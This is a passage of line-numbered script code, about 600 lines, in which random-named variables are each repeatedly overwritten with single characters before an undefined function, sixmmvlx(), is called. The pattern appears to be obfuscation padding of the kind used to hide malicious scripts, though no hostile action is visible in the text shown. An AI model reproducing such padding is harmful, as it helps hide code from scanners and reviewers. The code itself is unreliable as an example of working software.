762 | yqtbyvce = "t"; | |
763 | yqtbyvce = "j"; | |
764 | yqtbyvce = "g"; | |
765 | yqtbyvce = "l"; | |
766 | yqtbyvce = "b"; | |
767 | yqtbyvce = "Z"; | |
768 | yqtbyvce = "m"; | |
769 | yqtbyvce = "s"; | |
770 | yqtbyvce = "Y"; | |
771 | yqtbyvce = "r"; | |
772 | yqtbyvce = "I"; | |
773 | yqtbyvce = "v"; | |
774 | yqtbyvce = "P"; | |
775 | yqtbyvce = "_"; | |
776 | veyplkj = "e"; | |
777 | veyplkj = "h"; | |
778 | veyplkj = "f"; | |
779 | veyplkj = "w"; | |
780 | veyplkj = "K"; | |
781 | veyplkj = "m"; | |
782 | veyplkj = "S"; | |
783 | veyplkj = "l"; | |
784 | veyplkj = "L"; | |
785 | veyplkj = "g"; | |
786 | veyplkj = "c"; | |
787 | veyplkj = "G"; | |
788 | veyplkj = "H"; | |
789 | veyplkj = "n"; | |
790 | veyplkj = "Y"; | |
791 | veyplkj = "Y"; | |
792 | veyplkj = "W"; | |
793 | veyplkj = "r"; | |
794 | veyplkj = "E"; | |
795 | veyplkj = "v"; | |
796 | veyplkj = "x"; | |
797 | veyplkj = "I"; | |
798 | veyplkj = "N"; | |
799 | veyplkj = "l"; | |
800 | veyplkj = "L"; | |
801 | hyndph = "F"; | |
802 | hyndph = "M"; | |
803 | hyndph = "F"; | |
804 | hyndph = "e"; | |
805 | hyndph = "t"; | |
806 | hyndph = "z"; | |
807 | hyndph = "X"; | |
808 | hyndph = "C"; | |
809 | hyndph = "W"; | |
810 | hyndph = "N"; | |
811 | hyndph = "G"; | |
812 | hyndph = "M"; | |
813 | hyndph = "L"; | |
814 | hyndph = "R"; | |
815 | hyndph = "a"; | |
816 | hyndph = "X"; | |
817 | hyndph = "v"; | |
818 | hyndph = "h"; | |
819 | hyndph = "A"; | |
820 | hyndph = "o"; | |
821 | hyndph = "G"; | |
822 | hyndph = "D"; | |
823 | hyndph = "k"; | |
824 | hyndph = "F"; | |
825 | hyndph = "E"; | |
826 | hyndph = "A"; | |
827 | hyndph = "R"; | |
828 | hyndph = "r"; | |
829 | hyndph = "C"; | |
830 | hyndph = "M"; | |
831 | hyndph = "E"; | |
832 | hyndph = "Y"; | |
833 | glycmk = "I"; | |
834 | glycmk = "L"; | |
835 | glycmk = "D"; | |
836 | glycmk = "u"; | |
837 | glycmk = "m"; | |
838 | glycmk = "o"; | |
839 | glycmk = "W"; | |
840 | glycmk = "K"; | |
841 | glycmk = "a"; | |
842 | glycmk = "g"; | |
843 | glycmk = "m"; | |
844 | glycmk = "w"; | |
845 | glycmk = "i"; | |
846 | glycmk = "R"; | |
847 | glycmk = "E"; | |
848 | glycmk = "v"; | |
849 | glycmk = "R"; | |
850 | glycmk = "o"; | |
851 | glycmk = "w"; | |
852 | glycmk = "g"; | |
853 | glycmk = "q"; | |
854 | glycmk = "Z"; | |
855 | glycmk = "b"; | |
856 | glycmk = "u"; | |
857 | glycmk = "H"; | |
858 | qwfqvkbul = "o"; | |
859 | qwfqvkbul = "b"; | |
860 | qwfqvkbul = "i"; | |
861 | qwfqvkbul = "c"; | |
862 | qwfqvkbul = "K"; | |
863 | qwfqvkbul = "b"; | |
864 | qwfqvkbul = "D"; | |
865 | qwfqvkbul = "o"; | |
866 | qwfqvkbul = "h"; | |
867 | qwfqvkbul = "G"; | |
868 | qwfqvkbul = "e"; | |
869 | qwfqvkbul = "G"; | |
870 | qwfqvkbul = "E"; | |
871 | qwfqvkbul = "n"; | |
872 | qwfqvkbul = "U"; | |
873 | qwfqvkbul = "z"; | |
874 | qwfqvkbul = "W"; | |
875 | qwfqvkbul = "c"; | |
876 | qwfqvkbul = "P"; | |
877 | qwfqvkbul = "K"; | |
878 | qwfqvkbul = "B"; | |
879 | qwfqvkbul = "W"; | |
880 | qwfqvkbul = "g"; | |
881 | qwfqvkbul = "q"; | |
882 | qwfqvkbul = "w"; | |
883 | qwfqvkbul = "N"; | |
884 | qwfqvkbul = "v"; | |
885 | qwfqvkbul = "q"; | |
886 | qwfqvkbul = "M"; | |
887 | qwfqvkbul = "V"; | |
888 | qwfqvkbul = "V"; | |
889 | qwfqvkbul = "D"; | |
890 | qwfqvkbul = "R"; | |
891 | qwfqvkbul = "d"; | |
892 | qwfqvkbul = "M"; | |
893 | qwfqvkbul = "W"; | |
894 | qwfqvkbul = "M"; | |
895 | qwfqvkbul = "A"; | |
896 | qwfqvkbul = "m"; | |
897 | qwfqvkbul = "t"; | |
898 | qwfqvkbul = "f"; | |
899 | qwfqvkbul = "V"; | |
900 | qwfqvkbul = "6"; | |
901 | eafse = "Z"; | |
902 | eafse = "O"; | |
903 | eafse = "k"; | |
904 | eafse = "L"; | |
905 | eafse = "v"; | |
906 | eafse = "Y"; | |
907 | eafse = "N"; | |
908 | eafse = "I"; | |
909 | eafse = "z"; | |
910 | eafse = "O"; | |
911 | eafse = "m"; | |
912 | eafse = "V"; | |
913 | eafse = "d"; | |
914 | eafse = "t"; | |
915 | eafse = "u"; | |
916 | eafse = "s"; | |
917 | eafse = "H"; | |
918 | eafse = "y"; | |
919 | eafse = "D"; | |
920 | eafse = "b"; | |
921 | eafse = "m"; | |
922 | eafse = "G"; | |
923 | eafse = "K"; | |
924 | eafse = "F"; | |
925 | eafse = "o"; | |
926 | eafse = "k"; | |
927 | eafse = "x"; | |
928 | eafse = "k"; | |
929 | eafse = "t"; | |
930 | eafse = "K"; | |
931 | eafse = "P"; | |
932 | eafse = "n"; | |
933 | eafse = "p"; | |
934 | eafse = "D"; | |
935 | eafse = "D"; | |
936 | eafse = "c"; | |
937 | eafse = "K"; | |
938 | eafse = "y"; | |
939 | eafse = "d"; | |
940 | qquravud = "U"; | |
941 | qquravud = "z"; | |
942 | qquravud = "j"; | |
943 | qquravud = "P"; | |
944 | qquravud = "Q"; | |
945 | qquravud = "p"; | |
946 | qquravud = "w"; | |
947 | qquravud = "X"; | |
948 | qquravud = "C"; | |
949 | qquravud = "Y"; | |
950 | qquravud = "U"; | |
951 | qquravud = "M"; | |
952 | qquravud = "H"; | |
953 | qquravud = "B"; | |
954 | qquravud = "q"; | |
955 | qquravud = "e"; | |
956 | qquravud = "Y"; | |
957 | qquravud = "w"; | |
958 | qquravud = "O"; | |
959 | qquravud = "P"; | |
960 | qquravud = "h"; | |
961 | qquravud = "n"; | |
962 | qquravud = "Y"; | |
963 | qquravud = "I"; | |
964 | qquravud = "e"; | |
965 | qquravud = "q"; | |
966 | qquravud = "w"; | |
967 | qquravud = "m"; | |
968 | qquravud = "5"; | |
969 | dvolf = "n"; | |
970 | dvolf = "Y"; | |
971 | dvolf = "E"; | |
972 | dvolf = "y"; | |
973 | dvolf = "W"; | |
974 | dvolf = "w"; | |
975 | dvolf = "M"; | |
976 | dvolf = "l"; | |
977 | dvolf = "G"; | |
978 | dvolf = "a"; | |
979 | dvolf = "M"; | |
980 | dvolf = "b"; | |
981 | dvolf = "s"; | |
982 | dvolf = "p"; | |
983 | dvolf = "h"; | |
984 | dvolf = "A"; | |
985 | dvolf = " "; | |
986 | rbxqrvgh = "y"; | |
987 | rbxqrvgh = "h"; | |
988 | rbxqrvgh = "Y"; | |
989 | rbxqrvgh = "U"; | |
990 | rbxqrvgh = "w"; | |
991 | rbxqrvgh = "U"; | |
992 | rbxqrvgh = "D"; | |
993 | rbxqrvgh = "U"; | |
994 | rbxqrvgh = "h"; | |
995 | rbxqrvgh = "a"; | |
996 | dhsfymymp = "h"; | |
997 | dhsfymymp = "V"; | |
998 | dhsfymymp = "I"; | |
999 | dhsfymymp = "w"; | |
1000 | dhsfymymp = "N"; | |
1001 | dhsfymymp = "X"; | |
1002 | dhsfymymp = "j"; | |
1003 | dhsfymymp = "d"; | |
1004 | dhsfymymp = "A"; | |
1005 | dhsfymymp = "H"; | |
1006 | dhsfymymp = "0"; | |
1007 | rrclova = "h"; | |
1008 | rrclova = "x"; | |
1009 | rrclova = "G"; | |
1010 | rrclova = "j"; | |
1011 | rrclova = "S"; | |
1012 | rrclova = "A"; | |
1013 | rrclova = "F"; | |
1014 | rrclova = "X"; | |
1015 | rrclova = "q"; | |
1016 | uajfgvim = "w"; | |
1017 | uajfgvim = "e"; | |
1018 | uajfgvim = "N"; | |
1019 | uajfgvim = "z"; | |
1020 | uajfgvim = "Q"; | |
1021 | uajfgvim = "G"; | |
1022 | uajfgvim = "F"; | |
1023 | uajfgvim = "F"; | |
1024 | uajfgvim = "W"; | |
1025 | uajfgvim = "w"; | |
1026 | uajfgvim = "k"; | |
1027 | uajfgvim = "T"; | |
1028 | uajfgvim = "Q"; | |
1029 | uajfgvim = "j"; | |
1030 | uajfgvim = "W"; | |
1031 | uajfgvim = "D"; | |
1032 | uajfgvim = "n"; | |
1033 | uajfgvim = "W"; | |
1034 | uajfgvim = "F"; | |
1035 | uajfgvim = "x"; | |
1036 | uajfgvim = "a"; | |
1037 | uajfgvim = "D"; | |
1038 | uajfgvim = "F"; | |
1039 | uajfgvim = "c"; | |
1040 | xwvumzjf = "r"; | |
1041 | xwvumzjf = "U"; | |
1042 | bzqwfmku = "B"; | |
1043 | bzqwfmku = "X"; | |
1044 | bzqwfmku = "u"; | |
1045 | bzqwfmku = "U"; | |
1046 | bzqwfmku = "k"; | |
1047 | bzqwfmku = "O"; | |
1048 | bzqwfmku = "Y"; | |
1049 | bzqwfmku = "z"; | |
1050 | bzqwfmku = "s"; | |
1051 | bzqwfmku = "v"; | |
1052 | bzqwfmku = "b"; | |
1053 | bzqwfmku = "s"; | |
1054 | bzqwfmku = "k"; | |
1055 | oqolniqfa = "d"; | |
1056 | oqolniqfa = "r"; | |
1057 | oqolniqfa = "w"; | |
1058 | oqolniqfa = "Z"; | |
1059 | oqolniqfa = "p"; | |
1060 | oqolniqfa = "G"; | |
1061 | oqolniqfa = "H"; | |
1062 | oqolniqfa = "Z"; | |
1063 | oqolniqfa = "e"; | |
1064 | oqolniqfa = "A"; | |
1065 | oqolniqfa = "e"; | |
1066 | oqolniqfa = "h"; | |
1067 | oqolniqfa = "m"; | |
1068 | oqolniqfa = "z"; | |
1069 | oqolniqfa = "H"; | |
1070 | oqolniqfa = "N"; | |
1071 | oqolniqfa = "m"; | |
1072 | oqolniqfa = "r"; | |
1073 | oqolniqfa = "C"; | |
1074 | oqolniqfa = "y"; | |
1075 | oqolniqfa = "u"; | |
1076 | oqolniqfa = "R"; | |
1077 | oqolniqfa = "c"; | |
1078 | oqolniqfa = "V"; | |
1079 | oqolniqfa = "Y"; | |
1080 | oqolniqfa = "G"; | |
1081 | oqolniqfa = "W"; | |
1082 | oqolniqfa = "f"; | |
1083 | oqolniqfa = "X"; | |
1084 | oqolniqfa = "e"; | |
1085 | oqolniqfa = "U"; | |
1086 | oqolniqfa = "Q"; | |
1087 | oqolniqfa = "t"; | |
1088 | oqolniqfa = "w"; | |
1089 | oqolniqfa = "f"; | |
1090 | oqolniqfa = "W"; | |
1091 | oqolniqfa = "O"; | |
1092 | oqolniqfa = "x"; | |
1093 | oqolniqfa = "U"; | |
1094 | oqolniqfa = "E"; | |
1095 | oqolniqfa = "T"; | |
1096 | oqolniqfa = "C"; | |
1097 | oqolniqfa = "%"; | |
1098 | zhpkrsc = "w"; | |
1099 | zhpkrsc = "R"; | |
1100 | zhpkrsc = "j"; | |
1101 | zhpkrsc = "X"; | |
1102 | zhpkrsc = "o"; | |
1103 | zhpkrsc = "Y"; | |
1104 | zhpkrsc = "n"; | |
1105 | zhpkrsc = "N"; | |
1106 | zhpkrsc = "j"; | |
1107 | zhpkrsc = "P"; | |
1108 | zhpkrsc = "Q"; | |
1109 | zhpkrsc = "z"; | |
1110 | zhpkrsc = "c"; | |
1111 | zhpkrsc = "E"; | |
1112 | zhpkrsc = "d"; | |
1113 | zhpkrsc = "P"; | |
1114 | zhpkrsc = "h"; | |
1115 | zhpkrsc = "R"; | |
1116 | zhpkrsc = "d"; | |
1117 | zhpkrsc = "t"; | |
1118 | zhpkrsc = "q"; | |
1119 | zhpkrsc = "c"; | |
1120 | zhpkrsc = "M"; | |
1121 | zhpkrsc = "s"; | |
1122 | zhpkrsc = "J"; | |
1123 | zhpkrsc = "l"; | |
1124 | zhpkrsc = "i"; | |
1125 | zhpkrsc = "e"; | |
1126 | zhpkrsc = "O"; | |
1127 | zhpkrsc = "G"; | |
1128 | zhpkrsc = "-"; | |
1129 | buemvwt = "K"; | |
1130 | buemvwt = "Y"; | |
1131 | buemvwt = "n"; | |
1132 | buemvwt = "H"; | |
1133 | buemvwt = "a"; | |
1134 | buemvwt = "E"; | |
1135 | buemvwt = "S"; | |
1136 | buemvwt = "b"; | |
1137 | buemvwt = "j"; | |
1138 | buemvwt = "X"; | |
1139 | buemvwt = "H"; | |
1140 | buemvwt = "P"; | |
1141 | buemvwt = "B"; | |
1142 | buemvwt = "c"; | |
1143 | buemvwt = "Y"; | |
1144 | buemvwt = "r"; | |
1145 | buemvwt = "R"; | |
1146 | buemvwt = "p"; | |
1147 | buemvwt = "d"; | |
1148 | buemvwt = "O"; | |
1149 | buemvwt = "e"; | |
1150 | buemvwt = "w"; | |
1151 | buemvwt = "D"; | |
1152 | buemvwt = "r"; | |
1153 | buemvwt = "l"; | |
1154 | buemvwt = "@"; | |
1155 | vzlprhglr = "K"; | |
1156 | vzlprhglr = "G"; | |
1157 | vzlprhglr = "T"; | |
1158 | vzlprhglr = "T"; | |
1159 | vzlprhglr = "R"; | |
1160 | vzlprhglr = "X"; | |
1161 | vzlprhglr = "h"; | |
1162 | vzlprhglr = "u"; | |
1163 | vzlprhglr = "V"; | |
1164 | vzlprhglr = "n"; | |
1165 | vzlprhglr = "H"; | |
1166 | vzlprhglr = "z"; | |
1167 | vzlprhglr = "N"; | |
1168 | vzlprhglr = "A"; | |
1169 | vzlprhglr = "D"; | |
1170 | vzlprhglr = "i"; | |
1171 | vzlprhglr = "o"; | |
1172 | vzlprhglr = "C"; | |
1173 | vzlprhglr = "h"; | |
1174 | vzlprhglr = "v"; | |
1175 | vzlprhglr = "x"; | |
1176 | vzlprhglr = "f"; | |
1177 | vzlprhglr = "W"; | |
1178 | vzlprhglr = "g"; | |
1179 | vzlprhglr = "Y"; | |
1180 | vzlprhglr = "q"; | |
1181 | vzlprhglr = "x"; | |
1182 | vzlprhglr = "e"; | |
1183 | vzlprhglr = "d"; | |
1184 | vzlprhglr = "A"; | |
1185 | vzlprhglr = "v"; | |
1186 | vzlprhglr = "A"; | |
1187 | vzlprhglr = "g"; | |
1188 | vzlprhglr = "d"; | |
1189 | vzlprhglr = "F"; | |
1190 | vzlprhglr = "m"; | |
1191 | vzlprhglr = "M"; | |
1192 | vzlprhglr = "4"; | |
1193 | clbyzcq = "y"; | |
1194 | clbyzcq = "Z"; | |
1195 | clbyzcq = "o"; | |
1196 | clbyzcq = "T"; | |
1197 | clbyzcq = "B"; | |
1198 | clbyzcq = "L"; | |
1199 | clbyzcq = "D"; | |
1200 | clbyzcq = "J"; | |
1201 | clbyzcq = "F"; | |
1202 | clbyzcq = "Z"; | |
1203 | clbyzcq = "p"; | |
1204 | clbyzcq = "y"; | |
1205 | clbyzcq = "L"; | |
1206 | clbyzcq = "u"; | |
1207 | clbyzcq = "y"; | |
1208 | clbyzcq = "C"; | |
1209 | clbyzcq = "T"; | |
1210 | clbyzcq = "x"; | |
1211 | clbyzcq = "Y"; | |
1212 | clbyzcq = "G"; | |
1213 | clbyzcq = "w"; | |
1214 | clbyzcq = "v"; | |
1215 | clbyzcq = "t"; | |
1216 | clbyzcq = "h"; | |
1217 | clbyzcq = "B"; | |
1218 | clbyzcq = "W"; | |
1219 | clbyzcq = "Y"; | |
1220 | clbyzcq = "g"; | |
1221 | clbyzcq = "b"; | |
1222 | clbyzcq = "e"; | |
1223 | clbyzcq = "X"; | |
1224 | clbyzcq = "F"; | |
1225 | clbyzcq = "S"; | |
1226 | tqmrwoxj = "e"; | |
1227 | tqmrwoxj = "Q"; | |
1228 | nhfhz = "z"; | |
1229 | nhfhz = "q"; | |
1230 | nhfhz = "B"; | |
1231 | nhfhz = "j"; | |
1232 | nhfhz = "a"; | |
1233 | nhfhz = "u"; | |
1234 | nhfhz = "g"; | |
1235 | cuppgq = "l"; | |
1236 | cuppgq = "I"; | |
1237 | cuppgq = "v"; | |
1238 | cuppgq = "J"; | |
1239 | cuppgq = "t"; | |
1240 | cuppgq = "K"; | |
1241 | cuppgq = "W"; | |
1242 | cuppgq = "X"; | |
1243 | cuppgq = "x"; | |
1244 | cuppgq = "M"; | |
1245 | cuppgq = "Q"; | |
1246 | cuppgq = "c"; | |
1247 | cuppgq = "d"; | |
1248 | cuppgq = "v"; | |
1249 | cuppgq = "G"; | |
1250 | cuppgq = "F"; | |
1251 | cuppgq = "r"; | |
1252 | cuppgq = "r"; | |
1253 | cuppgq = "e"; | |
1254 | cuppgq = "B"; | |
1255 | cuppgq = "d"; | |
1256 | cuppgq = "a"; | |
1257 | cuppgq = "Y"; | |
1258 | cuppgq = "G"; | |
1259 | cuppgq = "P"; | |
1260 | cuppgq = "x"; | |
1261 | cuppgq = "J"; | |
1262 | cuppgq = "S"; | |
1263 | cuppgq = "U"; | |
1264 | cuppgq = "j"; | |
1265 | cuppgq = "I"; | |
1266 | cfqaie = "L"; | |
1267 | cfqaie = "E"; | |
1268 | cfqaie = "e"; | |
1269 | cfqaie = "O"; | |
1270 | cfqaie = "c"; | |
1271 | cfqaie = "E"; | |
1272 | cfqaie = "o"; | |
1273 | cfqaie = "w"; | |
1274 | cfqaie = "s"; | |
1275 | cfqaie = "H"; | |
1276 | cfqaie = "N"; | |
1277 | cfqaie = "t"; | |
1278 | cfqaie = "P"; | |
1279 | cfqaie = "T"; | |
1280 | sggdyppzn = "T"; | |
1281 | sggdyppzn = "a"; | |
1282 | sggdyppzn = "Y"; | |
1283 | sggdyppzn = "e"; | |
1284 | sggdyppzn = "G"; | |
1285 | sggdyppzn = "W"; | |
1286 | sggdyppzn = "f"; | |
1287 | sggdyppzn = "e"; | |
1288 | cwbul = "R"; | |
1289 | cwbul = "C"; | |
1290 | cwbul = "L"; | |
1291 | cwbul = "U"; | |
1292 | cwbul = "F"; | |
1293 | cwbul = "r"; | |
1294 | cwbul = "o"; | |
1295 | uqqpj = "c"; | |
1296 | uqqpj = "I"; | |
1297 | uqqpj = "r"; | |
1298 | uqqpj = "o"; | |
1299 | uqqpj = "m"; | |
1300 | uqqpj = "A"; | |
1301 | uqqpj = "I"; | |
1302 | uqqpj = "H"; | |
1303 | uqqpj = "c"; | |
1304 | uqqpj = "E"; | |
1305 | uqqpj = "Q"; | |
1306 | uqqpj = "z"; | |
1307 | uqqpj = "u"; | |
1308 | uqqpj = "G"; | |
1309 | uqqpj = "t"; | |
1310 | uqqpj = "e"; | |
1311 | uqqpj = "A"; | |
1312 | uqqpj = "r"; | |
1313 | uqqpj = "w"; | |
1314 | uqqpj = "H"; | |
1315 | uqqpj = "W"; | |
1316 | uqqpj = "Y"; | |
1317 | uqqpj = "k"; | |
1318 | uqqpj = "C"; | |
1319 | uqqpj = "t"; | |
1320 | uqqpj = "F"; | |
1321 | uqqpj = "J"; | |
1322 | uqqpj = "V"; | |
1323 | uqqpj = "y"; | |
1324 | uqqpj = "K"; | |
1325 | uqqpj = "A"; | |
1326 | uqqpj = "e"; | |
1327 | uqqpj = "p"; | |
1328 | uqqpj = "F"; | |
1329 | uqqpj = "b"; | |
1330 | uqqpj = "j"; | |
1331 | uqqpj = "g"; | |
1332 | uqqpj = "P"; | |
1333 | uqqpj = "y"; | |
1334 | uqqpj = "M"; | |
1335 | uqqpj = "m"; | |
1336 | uqqpj = "m"; | |
1337 | jdsup = "z"; | |
1338 | jdsup = "A"; | |
1339 | jdsup = "T"; | |
1340 | jdsup = "C"; | |
1341 | jdsup = "O"; | |
1342 | jdsup = "U"; | |
1343 | jdsup = "V"; | |
1344 | jdsup = "h"; | |
1345 | jdsup = "K"; | |
1346 | jdsup = "L"; | |
1347 | jdsup = "w"; | |
1348 | jdsup = "y"; | |
1349 | jdsup = "L"; | |
1350 | jdsup = "K"; | |
1351 | jdsup = "M"; | |
1352 | jdsup = "b"; | |
1353 | jdsup = "S"; | |
1354 | jdsup = "z"; | |
1355 | jdsup = "G"; | |
1356 | jdsup = "I"; | |
1357 | jdsup = "S"; | |
1358 | jdsup = "K"; | |
1359 | jdsup = "E"; | |
1360 | jdsup = "z"; | |
1361 | jdsup = "w"; | |
1362 | jdsup = "s"; | |
1363 | jdsup = "\""; | |
1364 | ynldhz = "j"; | |
1365 | ynldhz = "H"; | |
1366 | ynldhz = "W"; | |
1367 | ynldhz = "E"; | |
1368 | ynldhz = "Z"; | |
1369 | ynldhz = "v"; | |
1370 | ynldhz = "h"; | |
1371 | ynldhz = "x"; | |
1372 | ynldhz = "F"; | |
1373 | ynldhz = "u"; | |
1374 | ynldhz = "X"; | |
1375 | ynldhz = "Q"; | |
1376 | ynldhz = "c"; | |
1377 | ynldhz = "A"; | |
1378 | ynldhz = "r"; | |
1379 | rhxjxzzcn = "u"; | |
1380 | rhxjxzzcn = "B"; | |
1381 | rhxjxzzcn = "R"; | |
1382 | rhxjxzzcn = "v"; | |
1383 | sixmmvlx ( ); |
|